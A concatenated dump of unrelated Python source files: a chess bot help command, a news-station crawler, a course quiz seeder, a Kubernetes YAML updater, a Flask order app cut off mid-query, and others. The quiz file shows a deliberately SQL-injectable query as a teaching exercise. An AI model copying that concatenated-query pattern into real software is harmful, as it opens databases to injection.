\"description\": \"Sends a list of all commands.\\\\nUse `$help [command]` to get more information about a specific command.\",\r\n \"usage\": \"$help [command]\",\r\n \"examples\": [\r\n \"$help\",\r\n \"$help move\"\r\n ],\r\n \"cooldown\": 3\r\n }\r\n '''\r\n if command is None:\r\n embed = self.get_default_help_embed()\r\n embed.description = 'List of commands. Type `$help [command]` for more information about a certain command'\r\n\r\n embed.add_field(\r\n name='Playing', value='`challenge`, `move`, `profiles`, `resign`, `view`, `fen`, `time`', inline=False)\r\n embed.add_field(\r\n name='Viewing', value= '`view`, `fen`, `time`, `theme`', inline=False)\r\n embed.add_field(\r\n name='Rating', value='`rating`, `leaderboard`, `rank`, `stats`', inline=False)\r\n embed.add_field(\r\n name='Other', value='`ping`, `help`, `botinfo`, `invite`, `prefix`, `vote`')\r\n\r\n await ctx.send(embed=embed)\r\n else:\r\n cmd = self.client.get_command(command)\r\n if cmd is None or cmd.hidden or not cmd.enabled:\r\n await ctx.send('That command doesn\\'t exist!')\r\n return\r\n\r\n kwargs = json.loads(cmd.help)\r\n embed = self.make_help_embed(**kwargs)\r\n await ctx.send(embed=embed)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Help(bot))\r\n","sub_path":"Chess_Bot/cogs/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"592305032","text":"from apps.databaseaccess.NBAStatisticsDB import NBAStatisticsDB\nfrom apps.databaseaccess.ConnectionManager import ConnectionManager\nfrom apps.ServiceFactory import ServiceFactory\nfrom apps.data.TeamEnum import TeamEnum\nfrom datetime import date\n\nserviceFactory = ServiceFactory(True)\nnbaStatisticsDBManager = NBAStatisticsDB()\nconnection_manager = ConnectionManager(serviceFactory)\nconnection = connection_manager.get_connection()\ncur = connection.cursor()\nnbaStatisticsDB = NBAStatisticsDB()\ngameId = nbaStatisticsDBManager.fetch_game_id(date(2015,10,31), TeamEnum.PHOENIX_SUNS, cur)\nprint(\"game_id: \", gameId)\n\n\np1 = 'lebron'\np2 = 'charles'\np3 = 'kevin'\np4 = 'steve'\np5 = 'matt'\n\nlist = [p1, p2, p3, p4, p5]\n\nprint((2, 3)[False])\n\n\nplayers_in_game = {}\ni = 0\nfor player in list:\n if i < 2:\n players_in_game[player] = {'slug': player, 'didstart': True}\n else:\n players_in_game[player] = {'slug': player, 'didstart': False}\n i = i + 1\n\nprint(players_in_game)\n\n\n\n\n\n","sub_path":"practice/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390583688","text":"# python imports\nimport re\nfrom urllib.parse import urljoin\n\n# local imports\nfrom crawler.source.utils import geocode, extract_xpath\nfrom crawler.source.basesource import BaseSource\nfrom crawler.source.constants import DEAD_URLS, FCC_URL\n\nproperties = {\n\t\"identifier\": \"//*[@class='copyright' and contains(text(), 'CBS Broadcasting Inc')]\",\n\t\"parent_name\": \"CBS Broadcasting Inc\",\n\t\"parent_url\":\"https://en.wikipedia.org/wiki/CBS_Television_Stations#Stations\", # \"https://www.cbscorporation.com/portfolio/cbs-television-stations/\",\n\t\"parent_sources_xpath\": \"(//table[@class='toccolours'])[1]//td/b/a/@href\",\n\t\"software_name\":\"CBS Local\",\n\t\"source_name\": \"//meta[@name='application-name']/@content\",\n\t\"address\": \"(//dt[text()='Main Studio 
Address:']/following-sibling::dd)[1]/text()\",\n\t\"email\": \"//a[contains(@href, 'mailto:')]/@href\",\n\t\"phone\": re.compile(r'\\d{3}-\\d{3}-\\d{4}|\\(\\d{3}\\)\\s*\\d{3}-\\d{4}'),\n\t\"source_type\": \"TV\",\n\t\"has_rss\": True,\n\t\"is_popular\": False,\n\t\"crawl_type\": \"R\",\n\t\"contact_page\": \"/contact\",\n\t\"rss_path\": \"/feed\",\n\t\"rss_xpath\":\"\",\n\t\"articles_path\": \"\",\n\t\"articles_xpath\": \"\",\n\t\"icon_xpath\": \"//link[@rel='apple-touch-icon-precomposed']/@href\",\n\t\"facebook\": \"//meta[@property='article:publisher']/@content\",\n\t\"twitter\": \"//meta[@name='twitter:site']/@content\"\n}\n\n\nclass Source(BaseSource):\n\n\tdef __init__(self, url, props=properties, page_tree=None, page_html=None, *args, **kwargs):\n\t\tsuper().__init__(url, props, page_tree, page_html, *args, **kwargs)\n\n\t@classmethod\n\tdef build_sources(cls, props=properties):\n\t\t\"\"\"\n\t\tExtract url's from Wikipedia, then visit each page\n\t\tand extract the Station URL from it's Wiki page.\n\t\t\"\"\"\n\t\tstations_wiki = extract_xpath(props['parent_url'], props['parent_sources_xpath'])\n\n\t\t# extract station website from fcc profile urls generated above\n\t\tsource_urls = []\n\t\tfor wikipage in stations_wiki:\n\t\t\tstation_url = extract_xpath(\n\t\t\t\turljoin(\"https://en.wikipedia.org/\", wikipage),\n\t\t\t\t\"//th[text()='Website']/following-sibling::td//a/@href\"\n\t\t\t)\n\t\t\tif station_url:\n\t\t\t\tsource_urls.append(station_url[0])\n\n\t\tsources = [url for url in source_urls if not url.startswith(\"http://cw\")]\n\t\treturn super().build_sources(props, sources)\n\n\tdef _get_contact_details(self):\n\t\t\"\"\"\n\t\tAddress, email and phone number can be gotten by searching\n\t\tthe homepage for the public file url and extracting the\n\t\tFCC inspection files url for each TV station and then\n\t\tchecking the tv-profile page for an address which follows\n\t\tthe station name e.g KOAT-TV\n\t\t\t\t\t\t\t 3801 Carlisle Blvd. 
NE\n\t\t\t\t\t\t\t Albuquerque, N.M., 87107\n\t\tand parsing it using provided xpaths\n\t\t\"\"\"\n\t\tif not self.name:\n\t\t\traise AttributeError('Can\\'t get address without paper name')\n\n\t\t# grab the fcc_public file page from the homepage\n\t\tpublicfile_page = self.page_tree.xpath(\"//a[contains(@title, 'Public File') and not(contains(@title, 'Radio'))]/@href\")[0]\n\t\t# get fcc code from publicfile page\n\t\traw_fcc_code = extract_xpath(\n\t\t\tpublicfile_page,\n\t\t\t\"//div[@class='moretext']/script/text()\"\n \t)[0]\n\t\tfcc_code = re.search(r\"'([\\w-]+)',\", raw_fcc_code).group(1)\n\n\t\t# check FCC Public Inspection File for address\n\t\tfcc_page = urljoin(FCC_URL, fcc_code)\n\t\traw_address = self._get_address_from_fcc(fcc_page)\n\n\t\t# get email\n\t\tself.email = self._get_email()\n\n\t\treturn geocode(raw_address)\n","sub_path":"source/tv/cbs_tv.py","file_name":"cbs_tv.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465160712","text":"import re\nimport sys\n\n\ndef verify_board(raw_result: str, expected_board: str) -> bool:\n \"\"\"raw result to output gamma, expected board to oczekiwana\n plansza na koniec dzialania programu; jezeli uzywasz jakiejs\n biblioteki do obslugi terminala albo rysujesz ramki itp\n to musisz zmodyfikowac te metoda tak, zeby sobie z tym poradzila\n Zwraca True jezeli wynik jest prawidlowy, wpp False\"\"\"\n result = (\n raw_result.encode(\"ASCII\")\n .replace(b\"\\33[0m\", b\"\")\n .replace(b\"\\33[?25h\", b\"\")\n .replace(b\"\\33[2j\", b\"\")\n\t\t.replace(b\"\\33[K\", b\"\") #New line\n\t\t.replace(b\"\\33[7m\", b\"\") #Reverse coloring\n\t\t.replace(b\"\\33[0m\", b\"\") #Clear coloring\n .replace(b\"\\33[H\", b\"\")\n .replace(b\"\\33[30;47m\", b\"\")\n .decode(\"ASCII\")\n )\n matched = re.findall(r\"(([\\.\\d]+\\n)+)\", result)\n final_board = [f for (f, s) in matched if f.count(\"\\n\") > 1][-1]\n return expected_board in final_board\n\n\ndef main(result_path: str, expected_path: str) -> int:\n with open(result_path) as f:\n result = f.read()\n with open(expected_path) as f:\n expected_board = f.read()\n\n return int(not verify_board(result, expected_board))\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n if len(args) != 2:\n exit(\"Usage: python script.py gamma_output.file expected_output.file\")\n\n sys.exit(main(args[0], args[1]))\n","sub_path":"experimental/jm/interactive/verify_interactive_final_board.py","file_name":"verify_interactive_final_board.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609492586","text":"import sys, os\n\nsys.path.append('.')\n\nfrom app import app\nfrom database import db\nfrom datetime import date\nfrom sqlalchemy.exc import IntegrityError\nfrom blueprints.lessons import Chapter\nfrom blueprints.chapter_http import AnswerForHttp\nimport json\n\nimport sqlalchemy\nimport blueprints.answers as answers\n\n\nCHAPTERS = [\n {\n 'id': '01-HTML-CSS',\n 'name' : 'HTML et CSS',\n 'end_date': date(2019, 9, 15),\n 'questions': [\n {\n 'title':\n \"In the following piece of code, list all\"\n \" the attributes of the <code>p</code> tag,\"\n \" one per line (I'm not\"\n \" asking about\"\n \" the values, give only the attributes!)? 
<br />\"\n \" <code><pre>\"\n \"<p id='hello' class='column-3' data-userid='42'>\"\n \"Hello world!\"\n \"</p>\"\n \"</pre></code>\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Give three tags that belong to the head section\"\n \" of an HTML page, one per line\"\n \" (i.e. between <head> and </head>).\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Describe in a few words the role of HTML and CSS.\",\n 'coefficient': 1,\n },\n {\n 'title':\n \"HTML is an acronym. What is its expanded form?\",\n 'coefficient': 0.25,\n },\n {\n 'title':\n \"What is the role of <code>&nbsp;</code>\"\n \" in an HTML file?\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"What do we have to write in HTML to render the\"\n \" <code><</code> symbol?\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Which one of the following is a <strong>valid</strong>\"\n \" piece of HTML (enter 1, 2, 3 or 4):<ol>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</strong></em> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <html>dolor <strong>sit</strong></html> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</em></strong> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</strong><em> amet</p></code></li>\"\n \"</ol>\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Write a piece of HTML that displays \\\"Go to hell\\\"\"\n \" such as the text is a link to the website\"\n \" \\\"http://666.com\\\".\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'I am browsing a website at \"http://example.org/blog/\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"/userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Warning, this is not the same question! I am browsing a website at \"http://example.org/blog/\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Be careful! I am browsing a website at \"http://example.org/blog\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'This is the last question about urls! '\n ' I am browsing a website at \"http://example.org/blog\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Give a CSS selector for the <code>p</code> tags'\n ' inside a node with class <code>major</code>.',\n 'coefficient':1,\n },\n\n ],\n },\n {\n 'id': '02-Elm',\n 'name' : 'Elm',\n 'end_date': date(2019, 9, 19),\n 'questions': [\n { 'title':\n \"Write a <code>mult</code> function\"\n \" w(ith type annotation) taking two arguments and\"\n \" multiplying them.\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Let <code>f : String -> Int</code>\"\n \" and <code>g : List Float -> Int</code>\"\n \" be two functions. What is the type of\"\n \" <code>h</code> where:\"\n \" <pre>\"\n \" <code>h a b = f a + g b</code>\"\n \" </pre>\",\n 'coefficient': 1,\n },\n {\n 'title':\n \"How to produce the following piece of HTML in Elm?\"\n \"<pre>\"\n \" <code>\"\n \"<ul><li>Hi Marvin!</li></ul>\"\n \" </code>\"\n \"</pre>\",\n 'coefficient': 1,\n },\n {\n 'title':\n 'Write a function <code>f</code> (with'\n ' type annotation) that converts a'\n ' list of integers into a list of string. 
For instance'\n ' <code>f [2, 3, 5, 7] == [\"2\", \"3\", \"5\", \"7\"]</code>.'\n ' All the functions you need are in the slides.',\n 'coefficient': 1,\n },\n {\n 'title':\n '<code>ageStr</code> is a string entered by a user.'\n ' Define a variable <code>ageInt</code> which is'\n ' the conversion of <code>ageStr</code> in <code>Int</code'\n ' if it is a correct representation of an <code>Int</code>'\n ' or <code>-1</code> otherwise.',\n 'coefficient': 1,\n },\n\n ],\n },\n {\n 'id': '03-HTTP',\n 'name': 'HTTP',\n 'end_date': date(2019, 9, 26),\n 'questions': [],\n },\n {\n 'id': '04-AJAX',\n 'name': 'Json and Elm decoders',\n 'end_date': date(2019, 10, 2),\n 'questions': [\n {\n 'title':\n 'In Elm, what type do we use if we want represent'\n ' failure with an error message?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? In a <code>Result</code>,'\n ' the error and the value types'\n ' can be the same.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Write a piece of JSON respresenting multiple'\n ' animals: Bud, a dog; Kit, a cat and Bob, a fish',\n 'coefficient': 1,\n },\n {\n 'title':\n 'JSON is an acronym. What is its expanded form?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? Json can only be use with Javascript.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? A JSON object can'\n ' <strong>only</strong> be decoded'\n ' to an Elm record containing the same number'\n ' of fields.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? A field in a JSON object can'\n ' <strong>only</strong> be decoded'\n ' to an Elm field record with the same name.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Write out a type and a decoder for the following'\n ' piece of JSON:'\n ' <code><pre>{\\n'\n ' \"stars\": 5,\\n'\n ' \"followers\": [ \"Ford\", \"Arthur\"],\\n'\n ' \"name\": \"Marvin\"\\n'\n '}</pre></code>',\n 'coefficient': 1.5,\n }\n\n ],\n },\n {\n 'id': '05-security',\n 'name': 'User account and security',\n 'end_date': date(2019, 10, 9),\n 'questions': [\n {\n 'title':\n 'How should you store the passwords of the users in the'\n ' database?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'What mechnanism or technology does permit to'\n ' <strong>safely</strong> send the password user to the server?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? When dealing with password hashes, it is safe'\n ' to take the same salt for all the passwords.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Give a simple solution to mitigate the effects of a session'\n ' hijacking.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'How are the cookies shared between the client and the'\n ' server?',\n 'coefficient': 1,\n },\n {\n 'title':\n 'True or False? A malicious user can be logged in to an account'\n ' on a website without providing the password of this account.'\n ' If true, explain how, otherwise explain why (give only the'\n '\"big idea\").',\n 'coefficient': 1,\n },\n {\n 'title':\n 'In the following piece of code, <code>form</code> is a'\n ' dictionary containing the input from the user.'\n ' You can see here a request performed in an instant messaging'\n ' software. 
This request searches the messages sent to a given'\n    ' user among all the messages from the current user.'\n    ' <pre><code>cur.execute(\"SELECT * FROM messages WHERE'\n    ' to_userd_id=\\'\" + form[\"to_user_id\"] + \"\\' AND'\n    ' author_id=\" + current_user.get_id())</code></pre>'\n    ' What value could a malicious user use for the \"to_user_id\"'\n    ' field in order to get all the messages in the database?',\n    'coefficient': 1.5,\n    },\n    {\n    'title':\n    'Rewrite the following piece of code to prevent SQL'\n    ' injections:'\n    ' <pre><code>cur.execute(\"SELECT * FROM messages WHERE'\n    ' to_userd_id=\\'\" + form[\"to_user_id\"] + \"\\' AND'\n    ' author_id=\" + current_user.get_id())</code></pre>',\n    'coefficient': 0.5,\n    },\n\n    ],\n    },\n    {\n    'id': '06-websockets',\n    'name': 'Websockets',\n    'end_date': date(2019, 10, 16),\n    'questions': [\n    {\n    'title':\n    'No question for this lesson!',\n    'coefficient': 0\n    }\n    ]\n    }\n]\n\n\nwith app.app_context():\n    db.create_all()\n    for chapter in CHAPTERS:\n        for question in chapter['questions']:\n            question['grade_by_answer'] = {}\n        chapter['questions'] = json.dumps(chapter['questions'])\n\n        db.session.merge(Chapter(**chapter))\n        db.session.commit()\n","sub_path":"webapp/scripts/create_chapters.py","file_name":"create_chapters.py","file_ext":"py","file_size_in_byte":12489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"394018069","text":"#!/usr/bin/python3\n\nimport os\nimport re\nimport subprocess\nimport sys\nsys.path.append(sys.argv[1])\n\nimport yaml_utils\n\ndef ping(host):\n    cmd = 'ping -c %d %s'%(1, host)\n    p = subprocess.Popen(args=cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n    out = p.stdout.read().decode()\n\n    reg_receive = \"(\\d+) received\"\n    match_receive = re.search(reg_receive, out)\n    receive_count = -1\n\n    if match_receive:\n        receive_count = int(match_receive.group().split(' ')[0])\n    if receive_count > 0:\n        return True\n    else:\n        return False\n\n#input_node_name\ndef input_node_name(service_name):\n    if node_num == 1:\n        node_name = node_name_list[0]\n    else:\n        node_name = input(\"Please input run \" + service_name + \" node name (\" + str(node_name_list)[1:-1] + \"):\")\n        while True:\n            if node_name == \"\":\n                node_name = node_name_list[0]\n            if node_name in node_name_list:\n                break\n            else:\n                node_name = input(\"Error, please input run \" + service_name + \" node name again (\" + str(node_name_list)[1:-1] + \"):\")\n    return node_name\n\nnode_num = int(os.popen(\"kubectl get node | awk '{print $1}' | sed -n '2, $p' | wc -l\").read())\nprint(\"There are \" + str(node_num) + \" kubernetes nodes on your host server!!!\")\n\nif node_num == 0:\n    os._exit(0)\n\nnode_name_list = os.popen(\"kubectl get node | awk '{print $1}' | sed -n '2, $p'\").read().split(\"\\n\")\nnode_name_list = list(filter(None, node_name_list))\n\nnfs_server = \"localhost\"\nadi_directory = os.path.dirname(os.path.dirname(sys.argv[1]))\nprint(\"Looking for ADI home directory at: \" + adi_directory )\n\n\n#zookeeper\nnode_name = input_node_name(\"zookeeper\")\n\nyaml_file = sys.argv[1] + \"/zookeeper-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# kafka\nnode_name = input_node_name(\"kafka\")\n\nyaml_file = sys.argv[1] + \"/kafka-service-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# kafka-init\nnode_name = input_node_name(\"kafka-init\")\n\nyaml_file = sys.argv[1] + \"/kafka-init-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n\n#database\nnode_name = 
input_node_name(\"database\")\n\nyaml_file = sys.argv[1] + \"/database-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# cdn\nnode_name = input_node_name(\"cdn\")\n\nyaml_file = sys.argv[1] + \"/cdn-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"cdn\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"cdn\", adi_directory)\n\n#video-analytic-ffmpeg\nnode_name = input_node_name(\"video-analytic-ffmpeg\")\n\nyaml_file = sys.argv[1] + \"/video-analytic-ffmpeg-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n#video-analytic-gstreamer\nnode_name = input_node_name(\"video-analytic-gstreamer\")\n\nyaml_file = sys.argv[1] + \"/video-analytic-gstreamer-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n#ad-transcode\nnode_name = input_node_name(\"ad-transcode\")\n\nyaml_file = sys.argv[1] + \"/ad-transcode-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-transcode\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-transcode\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#account-service\nnode_name = input_node_name(\"account-service\")\n\nyaml_file = sys.argv[1] + \"/account-service-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#ad-decision\nnode_name = input_node_name(\"ad-decision\")\n\nyaml_file = sys.argv[1] + \"/ad-decision-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n\n#ad-content\nnode_name = input_node_name(\"ad-content\")\n\nyaml_file = sys.argv[1] + \"/ad-content-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-content\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-content\", adi_directory)\n\n#\"ad-insertion-frontend\"\nnode_name = input_node_name(\"ad-insertion-frontend\")\n\nyaml_file = sys.argv[1] + \"/ad-insertion-frontend-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-insertion-frontend\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-insertion-frontend\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#analytic-db\nnode_name = input_node_name(\"analytic-db\")\n\nyaml_file = sys.argv[1] + \"/analytic-db-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#content-provider\nnode_name = input_node_name(\"content-provider\")\n\nyaml_file = sys.argv[1] + \"/content-provider-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"content-provider\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"content-provider\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n\n#content-provider-transcode\nnode_name = input_node_name(\"content-provider-transcode\")\n\nyaml_file = sys.argv[1] + \"/content-provider-transcode-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"content-provider-transcode\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"content-provider-transcode\", 
adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n","sub_path":"deployment/kubernetes/update_yaml.py","file_name":"update_yaml.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463646958","text":"class Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n def dfs(start, end):\n if end in graph[start]: return graph[start][end]\n visited.add(start)\n for neighbor in graph[start]:\n if neighbor not in visited:\n res=dfs(neighbor, end)\n if res!=-1: return res*graph[start][neighbor]\n\n return -1\n\n res=[0]*len(queries)\n graph=collections.defaultdict(collections.defaultdict)\n for i, e in enumerate(equations):\n graph[e[0]][e[1]]=values[i]\n graph[e[1]][e[0]]=1/values[i]\n\n for i, q in enumerate(queries):\n visited=set()\n res[i]=dfs(q[0], q[1])\n\n return res\n","sub_path":"python/evaluate-division.py","file_name":"evaluate-division.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95397274","text":"\n# Reduce receives list and returns single result (can be used instead of loop)\nfrom functools import reduce\n\n# list\noneTo10 = list(range(1, 11))\nprint(oneTo10)\n\n# Add up the values in a list\nresult = reduce((lambda x, y: x + y), oneTo10)\nprint(result)\n","sub_path":"4 python cheet sheet/zj_lists_reduce.py","file_name":"zj_lists_reduce.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558991643","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom util import *\r\nfrom sys import argv\r\nfrom data_meta import *\r\n\r\n# python data_roi.py [matrixdir] [outputdir] [architecture]\r\n\r\ntrials = 100\r\ndef exprange(a, b, n):\r\n r = (float(b) / float(a))**(1.0/(n - 1))\r\n return [a * r**i for i in range(n)]\r\n\r\nn = 10\r\nasx_delta = 0.01\r\n\r\nmethods = [{\"name\":\"asx\",\r\n \"label\":\"ASX\",\r\n \"color\":\"red\",\r\n \"bound\" : lambda point : point[\"epsilon\"],\r\n \"bound_color\": \"green\"\r\n },\r\n {\"name\":\"oski\",\r\n \"label\":\"OSKI\",\r\n \"color\":\"blue\"}]\r\n\r\nmatrices = [{\"name\": \"3dtube_conv\",\r\n \"label\": \"3dtube\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"gupta1_conv\",\r\n \"label\": \"gupta1\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"ct20stif\",\r\n \"label\": \"ct20stif\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"pathological_asx\",\r\n \"label\": \"pathological_ASX\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(2, 0.07, n)], \"bound\":True},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.1, 1.0, n)]},\r\n \"ymax\": 0.5,\r\n \"xmaxmax\": True\r\n },\r\n {\"name\": \"pathological_oski\",\r\n \"label\": \"pathological_OSKI\",\r\n \"asx\": {\"points\": 
[{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(2, 0.07, n)], \"bound\":True},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.1, 1.0, n)]},\r\n \"ymax\": 4,\r\n \"xmaxmax\": True\r\n }\r\n ]\r\n\r\nreferences = get_references([matrix[\"name\"] for matrix in matrices], B = B)\r\nfor (reference, matrix) in zip(references, matrices):\r\n \r\n # generate local performance matrix\r\n filename = matrix['name'] + '.npy'\r\n tfile = os.path.join(spmv_times_dir, filename)\r\n assert os.path.isfile(tfile)\r\n matrix_times = np.load(tfile)\r\n\r\n # get time to do spmv with (0,0)\r\n base_time = matrix_times[0][0]\r\n # print(matrix[\"name\"])\r\n for method in methods:\r\n # print(method[\"name\"])\r\n times = []\r\n errors = []\r\n hi_bars = []\r\n lo_bars = []\r\n for point in matrix[method[\"name\"]][\"points\"]:\r\n # print(point)\r\n results = fill_estimates(method[\"name\"], [matrix[\"name\"]], B = B, results = True, trials = trials, **point)\r\n get_errors(results, [reference])\r\n times.append(results[0][\"time_mean\"] / base_time)\r\n errors.append(np.mean(results[0][\"errors\"]))\r\n hi_bars.append(np.std(results[0][\"errors\"]))\r\n lo_bars.append(np.std(results[0][\"errors\"]))\r\n\r\n outfile = 'error_' + method['name'] + '_' + matrix['name']\r\n out_path = os.path.join(roi_dir, outfile)\r\n\r\n # output in form\r\n # x y ylow yhigh\r\n with open(out_path, 'w') as out:\r\n for i in range(0, len(times)):\r\n out.write(str(times[i]) + ' ' + str(errors[i]) + ' ' + str(lo_bars[i]) + ' ' + str(hi_bars[i]) + '\\n')\r\n","sub_path":"src/data_roi.py","file_name":"data_roi.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388626468","text":"import os\nfrom flask import Flask, flash, redirect, render_template, request, session, jsonify\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\nimport datetime\nimport re\nfrom cs50 import SQL\nfrom helpers import apology, login_required, lookup, usd\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n# Ensure responses aren't cached\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///ordenes.db\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef index():\n if request.method == \"POST\":\n dia = request.form.get(\"dia\")\n ordenes = db.execute(\"SELECT * FROM list_ord WHERE dia = :dia\", dia=dia)\n\n # print (ordenes[0][\"id_Operador\"])\n return render_template(\"index.html\", mordenes=ordenes, dia=dia)\n else:\n dia = datetime.date.today()\n\n ordenes = db.execute(\"SELECT * FROM list_ord 